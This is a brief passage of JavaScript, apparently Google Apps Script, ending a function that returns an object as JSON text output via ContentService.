  return ContentService.createTextOutput(JSON.stringify(obj)).setMimeType(
    ContentService.MimeType.JSON
  )
}
